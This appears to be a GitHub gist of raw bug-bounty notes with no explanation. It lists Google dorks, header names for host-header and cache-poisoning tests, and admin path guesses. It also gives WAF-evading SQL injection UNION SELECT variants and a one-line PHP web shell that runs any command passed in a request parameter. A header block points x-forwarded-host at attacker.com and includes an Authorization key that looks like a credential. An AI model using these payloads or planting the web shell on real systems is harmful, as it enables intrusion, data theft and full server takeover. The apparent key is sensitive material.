Skip to content

Instantly share code, notes, and snippets.

https://stragwxnwe01.ah.nl/
https://golden.com/home
inurl /bug bounty
inurl : / security
inurl:security.txt
inurl:security "reward"
inurl : /responsible disclosure
inurl : /responsible-disclosure/ reward
inurl : / responsible-disclosure/ swag
inurl : / responsible-disclosure/ bounty
x-forwarded-scheme
x-forwarded-host
\
Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
x-forwarded-Proto
x-http-method-override
x-amz-website-redirect-location
X-host
X-Forwarded-Host
X-Forwarded-Server
admin/
administrator/
admin1/
admin2/
admin3/
admin4/
admin5/
usuarios/
usuario/
moderator/
+union%0Aselect+
+union+distinctROW+select+
/*!12345UNION+SELECT*/
/**//*!50000UNION+SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
/*!50000UniON+SeLeCt*/
union+/*!50000%53elect*/
+‪#union+‪#select
+‪#1q%0AuNiOn+all#qa%0A#%0AsEleCt
/*!%55NiOn*/+/*!%53eLEct*/
?a=11&t=
?a=114&t=
?a=155&t=
?a=33&t=
?a=34&t=
?a=9&t=
?a=latest&t=
?aa=
?abre=
?abrir=
site:
site:
site:No
site:Nama
site:ac
site:ad
site:ae
site:af
site:ag
site:ai
<?php
system($_REQUEST['cmd']);
?>
Headers :-
x-forwarded-scheme: http (13)
X-Forwarded-Port: 123
x-forwarded-host: attacker.com
\:1 (13)
Authorization: SharedKeyLite myaccount:ctzMq410TV3wS7upTBcunJTDLEJwMAZuFPfr0mrrA08=
x-forwarded-Proto: http (4)
x-http-method-override: HEAD (3)
x-amz-website-redirect-location (3)
X-host: